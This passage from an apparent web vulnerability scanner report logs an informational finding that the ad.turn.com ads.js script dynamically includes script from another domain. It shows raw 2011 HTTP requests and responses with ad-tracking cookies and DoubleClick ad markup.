3JR39idVXIu3f3Btwc7IzjVzjy2rMvBfZvNr-p9IKhzMtG_vpzilPLXHi079KP_3ZX9zXb6Tz5WewXZbgAbPJA1Kjx1hJ3Lx2jTH6Z2vbSJvJVgmvJ__nR9G2kz2nFBjBqYhxmY5WhWxlfSu5D7TjXyp5Ew1AXaLIxSNUvu23NH4F9SRsHGj-wraaDOVo-NnY8Z4bGjtD6F1vlAvbNz2LW0-XKY7_lT1bl78jcEnJ5WkDxaCFrKFt2PqJqf5DVukUoXlIHbOBASPSx_aSP-y9lN0xDYq3g0SjnCHIdwFIgaPN2GjM2E94Xjq_zRsOz19_sukeQe8KkXlnoIS6MkKzv5MhJ-zCwLajI_fAi7yzInpUPfqRl9A2iCBQ4QmbLn8QybuN97-yRVKiOkq451CVtrK-L_B9P-PLsJaA2q91YwrJSsVjkSgci3DslhbhLAHtk-5yNmlzVaY-ux4ldMmn95-Mr2ngwrG9CjJIipUiIWpKw0p87U_E8RCtd37Q5K62pPbYE3fjGnapFf2sSY7pRQig4QkcT5omhxvFxaDBZv8HsDc7oWxx3lMWh66OLM4EbN-7gsqGSEylLNa_SWJb-nVLwCV0QM7hreP48O_HKFKVj-fDyYACmr51dWIG_2mo97mPu8Iaf_kTsqgk7ugXpuyF50sVuvaLjQZQB-z3BRWjAOi3ckepqtCIQvo_oG8eMg83LsUjEPrRcsES3aoJiQUJTHUYLYRhoyzRad2pnwkOXjJjGluiggZfpQC0_zBkEv-v_j1kf0lu_F76LshZ13njOq9AcoC0Ui5m2rwOSIdaFvHPrlj9faHB4xTE0H4ycU-Far0EQ9jI2dgmB77e0oaHmNisOYCeGi33B_vta6JSr3j6o1UpD0LBlPnfb4q3Dmtj6bGXbZIhpmPDYJ3mAwabzJVvtmA9XADUGeSzCUmHsqeVvKRG6bTklSz_s9jHGHsU5_u3GxZteiyVHpNKhDzL7vQ0mJRuzfPJxh9dK_7uFehBzO10MqyMuK8xC49hxun-96l9nCAyeIF8XErkhGdpskxfTLV8EIwWVQ2uHZJLUSdGm0TeMLOBK0QhS-o5a2xyahlNh3iZjtdsIooTjsgAVMIgXUnyIDF5CqCarUh49S01Mh8PTu4y-hqompR6VWaJIG7SFeGTv62fgtjg1I8JQTrvXTA5V0FO00TmOhQnOjFd2gRw98MdY27_C75SQT3F4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA7HAeaX_6Zr-t3T_LQ2J_VLuAlmfHhZv8RdvHYfz6uVtWY4Zb1B-5Vx0eIvlVDYxBk; fc=FYu9a2gKbdfaoEP6zzAEbTULe5uzocfVf8GeQRlhtGzifjwXXf-M0jf6P6DTaEkggmUcePzA9deCmnu56kGfo3G9nFGYIVw5iLaHzkGYEwm4HlP0fRkaM5HlzXZ0g2VP9BoIXaOAeDVXRsLRbsFkfKtr4MnGGfFMDcCsCfLKkyPojEuHv26X9eomoEX8ElP2; pf=_1vlf3coaTRSlfnRn2BWvmKCqkXYWBqc-E6-ZlkCbgGS04H7stKnZdMqlx3yK2bUZZ6eDl_tJYtkuIVW7eskVZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:21 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=pD_gFAhHZ016tfVkgeG_5InTY8C3-ZePiVSXWMxnqornC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdetVRZLlX36YeiIgwaZY3FpkTJNpTu-tDf4fZLT0FlEqBmvO8Uk9CM6-0joRPbiXR789Ns8YMIodbd9oSQ80dok0rtGkt3b9TtUGpDbpuZJlmnSvjM6YIyaPo076xrJcUMpqvFKCK8YLFH8kku1qHnYE27uj29BfS5yq62USuCcbKSFM-Ia8iW6v4r--R4cQ0uOOC40LIDFF7ghihjQchWX76c4pTy1x4tO_Sj_92V_c3HIM3kTYgp41FGyov4eYc8ZPRlERVaGhUKD4I6xui-k39uQ1iPta8Wrn8c58UAYunU8Ljo1kIO66NNEOBdZGY9MNQF2iyMUjVL7ttzR-BfULWNnrTnHRhAo67h8kocDDs5cySrnTOh9dMxUw7WE-jb8CUGnr_9YMcr_n1EZErhbhuSGd1cU85KfnuzOH-gIz6477_djhhS3SPkBUOiwXvOKnJ5sQzaxqcr382lih416ri-pvt5MhqWaQjjpMBxrbKLi4kFOxMgDpMIvSE-_pNYetk_lkojZdYL09zwtbcpAD7k9QAhA1y9lElb1FxLMTTPDxEi4YsbnV5_AHEyzNvdcWuh9OwP5WPMPXscRpCIMeN1yIaQsj3afG85u2NuDpKflvfwPRcaattTbDebgh5WpDjfslrVyDxMBDlIppEJHdMCxgYn7ExS9rQpLrKZ_Z2nSvjM6YIyaPo076xrJcUMU9pmWoVnBlixHIFlMY3cEkbHzgou97WNb10sLlTme_qfpCL8Eb_AKATM_EJjD9j3iWH9n73vwyS9Iba3Tt9WP76c4pTy1x4tO_Sj_92V_c4P3019yAVgx2_ti72FX3YgMihkX8zucrcdwEbmMe-hv110qkc59lFVJvNpGPUP2wEhW-jakFElzPbLN9KKI4SFMNQF2iyMUjVL7ttzR-BfUx7ZN8WfPOVDlHmKorgnVms5cySrnTOh9dMxUw7WE-jZExyTg0inQXJYzK1oc-65MhhDaCIbRtKqhwxjYbgy7RK477_djhhS3SPkBUOiwXvO8O702X1aYINK4PjXrl81Cri-pvt5MhqWaQjjpMBxrbLRftAx0P2po2mcQN3xnAPWX0ln2ZevenUVZUvpz7ho9D7k9QAhA1y9lElb1FxLMTaQWNZQ9pVECOjwJqf0qS4xcWuh9OwP5WPMPXscRpCIMI17bQKB1MKSjJ4AnwSp4PEjbY-nuOofhw9IqjkaqEohueA6joXijA3s4lagZ_BmcnAhcETWG2r_CoUdLQLtjX1yzr7JSNK1C6Wfrc4PoBe49OjAakl7-2a3YUyQSEcAEadK-MzpgjJo-jTvrGslxQ-aD17WpUy-2kMCPACiI6olM2M4TlfE8-EAAJpHFMIjpLWcQpuP7-rZntDjqWT1AepfX9ysrspxpTakTdWuxDa7vpzilPLXHi079KP_3ZX9zDNdXMQTa13WNC7oLr6-hZ2xcqNpbx_qyOHF8bx__m3LjU2naVq8rzPkfHTZFJAYogPyKWOgXpB9GfxR8d3lqM0w1AXaLIxSNUvu23NH4F9TWnkDgrZHe8T6IOXfKC2_NzlzJKudM6H10zFTDtYT6NhcVjl29PoaOApRJaA6XuwrKBNFaS9_IA_SYgAy6Pzlvrjvv92OGFLdI-QFQ6LBe85Dge1nISCa8_412MA9jLBGuL6m-3kyGpZpCOOkwHGtsoSSTaS2xg6Bv8mW5gJR3yXzlPMql1xzrSAgN1mjs8uJD3XZ60zEd7PscVtFglBi6fn_74IR2tqQOzDhhuuvsvVxa6H07A_lY8w9exxGkIgye2885-8oYawk5NLy_kDdkRRsPWTYc5aSSl5tqKlpE6WckgCGSuiZNCnk1aHQCYkDPgK_vtMxk3J_RnF-KCsLBadK-MzpgjJo-jTvrGslxQxjpLwkY8CzsjWigFXd0ugp0Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4ejlrdfdTeNNQ23r3cVc08dLvpzilPLXHi079KP_3ZX9zLwF1To5J2I9_8J-ktyw5JHi1LtOvJl4H91g0BF7nljG-z8CfdXpYmY1u_oWwboSZ-62KbEowWxnVcnSXWo8CqG_AXolZ7HlYcn1IG2iuDzUm3-TBwK9N_v-cRmWlQKoAs_Y6ICgWasMM5DWElEE3mrRsLtIT2Ygve6thNkIDmTPFiLLg2uvk7lV34RLrT7sDN3vu4WG44zQxf55cnAq2dXP7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIQqOlzr39jpVus2s2MGJt02CP-a9-Zc2aK4TggTg7yLFan1KYNZCuznhMO2BM5lPflcAqlDMUSFQwAhqSIWB4T1IuXmPpa4qmXbukrnlZ5AZhfXD4z8mc7oab7q2cflP4Cuw7Sh2zVZs8LUHvh0B4ORTdn2OCYqN2AXXm94C1IFpVYVR8tDeUmGP2D4iuMQCSFfw-YwuOpTTqo7xcxFgip05fDwrMzPs6JG3UjNsUWsBBcQRYk1N7DWc75XJ52KLHxtHGJu2SIaoECffegue6YBx-pMNnjN-kh10ARFgNxf4KgwePV0rhZSAPs0elkMlPPKuRfb5of4RS0KM-vIxCYbmNVwJcjqeJj-8RO-O8uLM5d41RtV-TYB6ZX2Z2f2sWULPjaj-TcixYWnJOckv2x1hkOcqMBa-FJ6vjArRdGUC4ZDF-xhv69qwmZh1BW_sjp_JMv-2OsH7kmJYuX1kJMjBWVrz7u7grGNhHqSIQM0YiFZs1e46yYs72x4V4G5g6skfznJxWLFANSsaDEinwcgAePJitWrkZg8MusjZ42hhaz4NsfZaH43yNAuV5jEfuNBW0UUD1FTrR8dWua3pbTOr3qmCPy6KMbaqZ1CZZZTdO4w56OOE1MWc0ME5geary4IWidZFBM4CXdWml_NgTpNtY7C9ADacWp13yFDNv5QfHWkJGzFLhJWbD2TzP799pVhd2hJTWEIYee2zL7kulFPLjRcdP-8HHM_yAcVuLd1iUr3CDcUNKfecgTUF0tcGU3N-qMYYUsx1t0HBVMuxDw2yb3IRskUU-dEa_gXk_R9CFAHBfb6-R9xgF7P_u8gabLFRUWEK-fROx3Y031mDwLJU1IVthPmLsRdRWx1fxVOkXpv_BNQrM-J_qzhSw9GPlerfb1VYq4tSTzJHZO-4mVs-dIKwEw_MUzZNPrbaVRvLeGtyG2uR1W_3gwxi8sWv9CqOFUDyegOYAwbeZGxYpwBYsSdyFlGM3KDJPLAebY4k60AZXH9DSc16U42vooYbtVxfvV4W5wlx75RUOO2HiQFm0Nl_lo0Vbm-d7snQaJ8ckL1DbpmZ33jmhZs2ZSpc_Ke_v4SMlvUaAfh97W6LUjGnlIIhFHICklznXqDkhBy-iycabDvZFbaJMzr-ki6_1LjeUvSL-YDv7U7RseZZTJ; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Set-Cookie: fc=9_5ay7rffuoTiRWSKxNkRHoXEcukANXik7WwoUVZ9ojWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF_hBg4ZnscOU_y7Sc1CSCH9rInWq2zX4VXT-XKnjQ0qC3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Set-Cookie: pf=B7ZBnPXRFmyqr3AjEaKP5FRj_CNMFT3q5p6wKb9ZALCS04H7stKnZdMqlx3yK2bU52sOOuiZ0GSbuZhAi5YdhZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:21 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:23:20 GMT
Content-Length: 10889


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4515.131803.TURN/B5378843.4;abr=!ie;sz=160x600;ord=3693595831803653362?;click=http://r.turn.com/r/tpclick/id/8iyF6tZJQjP7Lw4AAgIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBNp-zZ0C0TcCeJcf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.34. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=jpgdhg9u3sNhsHaJRlQfD7s3M4ppch86fwqbNsEQoK0hE9MNJhGa6rfuLTDXwqgLUAQw1ppc7q_cXI65lvmh1q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLUQtPUcUlC_s56T2e_ZUTBr39Jzt9X3KZSy9qlP-Cz3tgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3j6d2S4vVdi3hczlBeeHjQhxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAeQAItqsK5WhEMkk4Fa_OmlA2N1Iqvj8Efw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676620&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658620545&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658620550&frm=1&adk=2614322350&ga_vid=1094438829.1303658621&ga_sid=1303658621&ga_hid=825275319&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813005&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=pD_gFAhHZ016tfVkgeG_5InTY8C3-ZePiVSXWMxnqornC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdetVRZLlX36YeiIgwaZY3FpkTJNpTu-tDf4fZLT0FlEqBmvO8Uk9CM6-0joRPbiXR789Ns8YMIodbd9oSQ80dok0rtGkt3b9TtUGpDbpuZJlmnSvjM6YIyaPo076xrJcUMpqvFKCK8YLFH8kku1qHnYE27uj29BfS5yq62USuCcbKSFM-Ia8iW6v4r--R4cQ0uOOC40LIDFF7ghihjQchWX76c4pTy1x4tO_Sj_92V_c3HIM3kTYgp41FGyov4eYc8ZPRlERVaGhUKD4I6xui-k39uQ1iPta8Wrn8c58UAYunU8Ljo1kIO66NNEOBdZGY9MNQF2iyMUjVL7ttzR-BfULWNnrTnHRhAo67h8kocDDs5cySrnTOh9dMxUw7WE-jb8CUGnr_9YMcr_n1EZErhbhuSGd1cU85KfnuzOH-gIz6477_djhhS3SPkBUOiwXvOKnJ5sQzaxqcr382lih416ri-pvt5MhqWaQjjpMBxrbKLi4kFOxMgDpMIvSE-_pNYetk_lkojZdYL09zwtbcpAD7k9QAhA1y9lElb1FxLMTTPDxEi4YsbnV5_AHEyzNvdcWuh9OwP5WPMPXscRpCIMeN1yIaQsj3afG85u2NuDpKflvfwPRcaattTbDebgh5WpDjfslrVyDxMBDlIppEJHdMCxgYn7ExS9rQpLrKZ_Z2nSvjM6YIyaPo076xrJcUMU9pmWoVnBlixHIFlMY3cEkbHzgou97WNb10sLlTme_qfpCL8Eb_AKATM_EJjD9j3iWH9n73vwyS9Iba3Tt9WP76c4pTy1x4tO_Sj_92V_c4P3019yAVgx2_ti72FX3YgMihkX8zucrcdwEbmMe-hv110qkc59lFVJvNpGPUP2wEhW-jakFElzPbLN9KKI4SFMNQF2iyMUjVL7ttzR-BfUx7ZN8WfPOVDlHmKorgnVms5cySrnTOh9dMxUw7WE-jZExyTg0inQXJYzK1oc-65MhhDaCIbRtKqhwxjYbgy7RK477_djhhS3SPkBUOiwXvO8O702X1aYINK4PjXrl81Cri-pvt5MhqWaQjjpMBxrbLRftAx0P2po2mcQN3xnAPWX0ln2ZevenUVZUvpz7ho9D7k9QAhA1y9lElb1FxLMTaQWNZQ9pVECOjwJqf0qS4xcWuh9OwP5WPMPXscRpCIMI17bQKB1MKSjJ4AnwSp4PEjbY-nuOofhw9IqjkaqEohueA6joXijA3s4lagZ_BmcnAhcETWG2r_CoUdLQLtjX1yzr7JSNK1C6Wfrc4PoBe49OjAakl7-2a3YUyQSEcAEadK-MzpgjJo-jTvrGslxQ-aD17WpUy-2kMCPACiI6olM2M4TlfE8-EAAJpHFMIjpLWcQpuP7-rZntDjqWT1AepfX9ysrspxpTakTdWuxDa7vpzilPLXHi079KP_3ZX9zDNdXMQTa13WNC7oLr6-hZ2xcqNpbx_qyOHF8bx__m3LjU2naVq8rzPkfHTZFJAYogPyKWOgXpB9GfxR8d3lqM0w1AXaLIxSNUvu23NH4F9TWnkDgrZHe8T6IOXfKC2_NzlzJKudM6H10zFTDtYT6NhcVjl29PoaOApRJaA6XuwrKBNFaS9_IA_SYgAy6Pzlvrjvv92OGFLdI-QFQ6LBe85Dge1nISCa8_412MA9jLBGuL6m-3kyGpZpCOOkwHGtsoSSTaS2xg6Bv8mW5gJR3yXzlPMql1xzrSAgN1mjs8uJD3XZ60zEd7PscVtFglBi6fn_74IR2tqQOzDhhuuvsvVxa6H07A_lY8w9exxGkIgye2885-8oYawk5NLy_kDdkRRsPWTYc5aSSl5tqKlpE6WckgCGSuiZNCnk1aHQCYkDPgK_vtMxk3J_RnF-KCsLBadK-MzpgjJo-jTvrGslxQxjpLwkY8CzsjWigFXd0ugp0Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4ejlrdfdTeNNQ23r3cVc08dLvpzilPLXHi079KP_3ZX9zLwF1To5J2I9_8J-ktyw5JHi1LtOvJl4H91g0BF7nljG-z8CfdXpYmY1u_oWwboSZ-62KbEowWxnVcnSXWo8CqG_AXolZ7HlYcn1IG2iuDzUm3-TBwK9N_v-cRmWlQKoAs_Y6ICgWasMM5DWElEE3mrRsLtIT2Ygve6thNkIDmTPFiLLg2uvk7lV34RLrT7sDN3vu4WG44zQxf55cnAq2dXP7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIQqOlzr39jpVus2s2MGJt02CP-a9-Zc2aK4TggTg7yLFan1KYNZCuznhMO2BM5lPflcAqlDMUSFQwAhqSIWB4T1IuXmPpa4qmXbukrnlZ5AZhfXD4z8mc7oab7q2cflP4Cuw7Sh2zVZs8LUHvh0B4ORTdn2OCYqN2AXXm94C1IFpVYVR8tDeUmGP2D4iuMQCSFfw-YwuOpTTqo7xcxFgip05fDwrMzPs6JG3UjNsUWsBBcQRYk1N7DWc75XJ52KLHxtHGJu2SIaoECffegue6YBx-pMNnjN-kh10ARFgNxf4KgwePV0rhZSAPs0elkMlPPKuRfb5of4RS0KM-vIxCYbmNVwJcjqeJj-8RO-O8uLM5d41RtV-TYB6ZX2Z2f2sWULPjaj-TcixYWnJOckv2x1hkOcqMBa-FJ6vjArRdGUC4ZDF-xhv69qwmZh1BW_sjp_JMv-2OsH7kmJYuX1kJMjBWVrz7u7grGNhHqSIQM0YiFZs1e46yYs72x4V4G5g6skfznJxWLFANSsaDEinwcgAePJitWrkZg8MusjZ42hhaz4NsfZaH43yNAuV5jEfuNBW0UUD1FTrR8dWua3pbTOr3qmCPy6KMbaqZ1CZZZTdO4w56OOE1MWc0ME5geary4IWidZFBM4CXdWml_NgTpNtY7C9ADacWp13yFDNv5QfHWkJGzFLhJWbD2TzP799pVhd2hJTWEIYee2zL7kulFPLjRcdP-8HHM_yAcVuLd1iUr3CDcUNKfecgTUF0tcGU3N-qMYYUsx1t0HBVMuxDw2yb3IRskUU-dEa_gXk_R9CFAHBfb6-R9xgF7P_u8gabLFRUWEK-fROx3Y031mDwLJU1IVthPmLsRdRWx1fxVOkXpv_BNQrM-J_qzhSw9GPlerfb1VYq4tSTzJHZO-4mVs-dIKwEw_MUzZNPrbaVRvLeGtyG2uR1W_3gwxi8sWv9CqOFUDyegOYAwbeZGxYpwBYsSdyFlGM3KDJPLAebY4k60AZXH9DSc16U42vooYbtVxfvV4W5wlx75RUOO2HiQFm0Nl_lo0Vbm-d7snQaJ8ckL1DbpmZ33jmhZs2ZSpc_Ke_v4SMlvUaAfh97W6LUjGnlIIhFHICklznXqDkhBy-iycabDvZFbaJMzr-ki6_1LjeUvSL-YDv7U7RseZZTJ; fc=9_5ay7rffuoTiRWSKxNkRHoXEcukANXik7WwoUVZ9ojWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF_hBg4ZnscOU_y7Sc1CSCH9rInWq2zX4VXT-XKnjQ0qC3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; pf=B7ZBnPXRFmyqr3AjEaKP5FRj_CNMFT3q5p6wKb9ZALCS04H7stKnZdMqlx3yK2bU52sOOuiZ0GSbuZhAi5YdhZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:39 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=FfdNBPqTg5Ogeg4Gvt1sD91oc1OvAAIopJH1MfG_EhLnC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rddTOvP6b6gjBcpH_C1SCNpqOOOSUZ6393Jg_uuC6PaOyufpl4r1zJFBSq1N8uZBwmJnJIAhkromTQp5NWh0AmJAoqPsrsARTvM4FL3_F2IyUWnSvjM6YIyaPo076xrJcUMRbqqdnKZE_Rr_uBv1fpYoqTX7HdciFKtDLlrsXGI8WeFEaqmhzc4AexOvlbEc2vBxeaHaPnRGzUGsshYknbHZ76c4pTy1x4tO_Sj_92V_c7n9dBgb-mUQwCsfFjswrIIZPRlERVaGhUKD4I6xui-k8lCKtjWb8L9cUWaU-0UIo8q2otA9JeeRhKkLEFeUQ_RMNQF2iyMUjVL7ttzR-BfUwEHA_EPrShsGu2vVdRNE585cySrnTOh9dMxUw7WE-jbzjFm2F4SROX5XJ58cmC66JFBq_2-XSn1gqAIjLZzdU6477_djhhS3SPkBUOiwXvOlmotVFErHsZ98d0kz-YJqri-pvt5MhqWaQjjpMBxrbDxPEDs1qpDsWDsRvlIeEnz5gKDVPYLbmT4OmR4NPZdtD7k9QAhA1y9lElb1FxLMTTlE9wGHxh1vi4jaKSjW24VcWuh9OwP5WPMPXscRpCIMAUwsBeLeV0CDvZM5QZ6F